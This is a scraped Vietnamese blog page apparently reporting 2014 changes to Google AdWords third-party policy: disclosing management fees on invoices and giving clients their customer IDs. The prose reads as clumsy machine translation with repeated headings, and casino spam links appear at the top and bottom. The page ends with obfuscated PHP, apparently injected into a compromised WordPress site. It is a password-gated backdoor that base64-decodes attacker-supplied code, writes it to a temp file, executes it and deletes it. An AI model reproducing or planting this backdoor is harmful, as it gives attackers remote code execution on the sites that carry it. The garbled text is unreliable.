Google thay đổi chính sách của bên thứ ba Đến tháng 11 năm 2014
jeu plinko avis pin up catcasino vavada официальный jucky jet

Google thay đổi chính sách của bên thứ ba Đến tháng 11 năm 2014

Ngày 18/10/2014 đăng bởi seo3.VS [email protected]

Hai yêu cầu minh bạch mới để giữ các đối tác bên thứ ba có trách nhiệm hơn đối với các hành động và hóa đơn của họ.
Tháng trước, Google tung ra một trung tâm chính sách cập nhật cho tất cả các nhà quảng cáo. Bắt đầu vào tháng Mười Google thay đổi chính sách của bên thứ ba Đến tháng 11 năm 2014
Hai yêu cầu minh bạch mới là:
Phí quản lý

Google thay đổi chính sách của bên thứ ba Đến tháng 11 năm 2014
bên thứ ba thường tính lệ phí quản lý cho các dịch vụ có giá trị mà họ cung cấp, và cuối cùng các nhà quảng cáo nên biết nếu họ đang có được tính các khoản phí này. Nếu bạn tính lệ phí quản lý vượt quá chi phí của AdWords hoặc AdWords Express, cho khách hàng biết. Ở mức tối thiểu, thông báo cho khách hàng mới bằng văn bản trước khi mỗi lần bán đầu tiên và tiết lộ sự tồn tại của chi phí này vào hóa đơn khách hàng.

AdWords hoặc AdWords Express ID khách hàng

Điều quan trọng là các nhà quảng cáo có khả năng liên hệ trực tiếp với Google lo ngại về một đối tác bên thứ ba. Để cho phép Google để điều tra đúng và hỗ trợ các nhà quảng cáo, chúng tôi yêu cầu bạn cung cấp cho khách hàng của bạn với các ID khách hàng AdWords của họ hoặc tài khoản AdWords Express khi được yêu cầu.
Các chính sách hiện hành nhiệm vụ mà các bên thứ ba tiết lộ chi phí phương tiện truyền thông AdWords, nhấp chuột và ấn tượng ở cấp tài khoản. Bây giờ tất cả các chi phí quản lý phải được công bố trên hoá đơn. Vì vậy, nếu bạn là cơ quan cuộn phí quản lý cơ quan được xác định trước với phương tiện truyền thông chi tiêu trên hoá đơn hàng tháng, các chi phí này sẽ phải được chia thành từng nhóm.
Thứ hai, và điều này nên được rõ ràng, cung cấp cho khách hàng của bạn ID khách hàng của họ khi họ yêu cầu cho họ.

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}